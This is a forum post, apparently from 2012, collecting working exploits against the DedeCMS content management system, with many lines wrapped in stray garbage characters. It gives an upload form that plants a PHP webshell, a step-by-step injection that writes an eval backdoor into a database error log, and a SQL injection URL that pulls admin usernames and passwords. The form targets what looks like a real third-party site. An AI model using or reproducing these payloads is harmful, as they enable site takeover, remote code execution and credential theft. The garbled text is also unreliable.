) l1 a; @0 {( b# U+ \/ Z! ~5 C<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>% l+ }! x" S8 I$ j$ n, Y/ a
</head>
! O( J4 h3 R* L& a<body style="FONT-SIZE: 9pt">3 _5 A! h# h9 x: D! w9 E
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />- P5 c4 x: c4 M6 R- [5 t
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
* y. M% D/ l* S' E# ]) N% F% {- p<input type='hidden' name='activepath' value='/data/cache/' />( L5 ?- J" H: b1 K3 M
<input type='hidden' name='cfg_basedir' value='../../' />" H7 Q, h6 y- g* n0 N
<input type='hidden' name='cfg_imgtype' value='php' />" L8 D2 T9 o0 U
<input type='hidden' name='cfg_not_allowall' value='txt' />1 `& y7 P" B3 n( m2 P* G6 T
<input type='hidden' name='cfg_softtype' value='php' />
2 A: W) j) H+ {' k. X2 K2 J<input type='hidden' name='cfg_mediatype' value='php' />% D6 A7 `# s* R, A' G! z4 d/ d
<input type='hidden' name='f' value='form1.enclosure' />! b* R! X( R, F
<input type='hidden' name='job' value='upload' />
`2 y+ k9 `% `: Y<input type='hidden' name='newname' value='fly.php' />
# k5 L+ X7 z" r4 SSelect U Shell <input type='file' name='uploadfile' size='25' />: p3 [: b2 B0 n
<input type='submit' name='sb1' value='确定' />
8 t5 w' `9 O4 T# ]</form>
2 ?$ J* G3 b' P+ h% M6 u<br />It's just a exp for the bug of Dedecms V55...<br />
* ]# q7 c2 h/ HNeed register_globals = on...<br />8 [) O0 }+ e7 g4 g
Fun the game,get a webshell at /data/cache/fly.php...<br />
/ L! M9 H, \& A: w6 x' ^2 Y' h</body>! } w* c; g8 g E; [
</html>
- W6 C9 B1 V7 C" V5 ~) G. W
5 e2 k' ^% Q2 J, Q. _4 [: `- z3 G
~8 k2 W; W! b7 ]8 _" Q3 f; ?8 k; c$ c3 f) p/ J8 C! X
/ O: }( n* D! M3 F
. H1 h- `- x5 ?( c6 z
7 D! }6 m: {; F) C f7 a9 I
% B8 N( Z; ~. b* H9 l
) _: R+ i1 s8 b" l* m2 O* p
" G' E7 X4 ^- u0 [1 \# m
* F; s7 f5 E3 H, Z, y) L7 |7 ^+ p织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞8 O+ W3 ?" p1 \
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
; N/ ]/ O2 o& Q9 T, e9 B; |1. 访问网址:( D# z" Z( Z1 A: u* {5 j d6 t1 [
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
8 A4 P" i' Q, t可看见错误信息
1 y2 }' L6 ?2 j5 A, Y( O$ F; f
4 c j8 t! }4 f0 P7 O/ Y. h3 x
& N! e# U* S j6 q! F& `- f; c& W2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
# X" O- r. @5 w& q. ~8 Kint(3) Error: Illegal double '1024e1024' value found during parsing
" H3 G/ Q5 x% E7 OError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" O) t0 { y; K _
* y5 ?4 r Z. K8 |7 C$ o7 B" T( o2 T# I {3 L. p: Y( _" n2 y
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是* V" Z3 M7 `* e, \
% Z2 H5 t( W+ Q# P5 Z% H# G
+ L+ h" q, z) S) T<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>, X' _ E/ C5 W7 ^; l( z
1 N' i1 K9 z' i) o3 j9 t+ O) K0 O5 G/ {9 [
按确定后的看到第2步骤的信息表示文件木马上传成功.# w# q0 T! F3 B7 Y) p
" m: F6 h5 `6 |1 g1 j$ y
6 `9 ^* M9 I D: g2 n( ]7 l( A0 S' k+ o
* w7 m/ N" f5 n" t' B! O
' S# I$ [7 @0 N- r3 \1 V
5 f$ g7 ~7 k' w3 k
! A: _ r4 S% `% c! w1 ^( D& `* N: U& b* B
% U2 ?" ?0 a$ n+ }4 g$ P6 m: N, u/ \. t6 W" L& m4 T
6 F+ t+ W, ~. e! `3 x7 @6 h
2 o2 B- E" Q b! v) s# A" Z" {织梦(DedeCms)plus/infosearch.php 文件注入漏洞# }& ^" C" J& \9 N/ W% A n
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对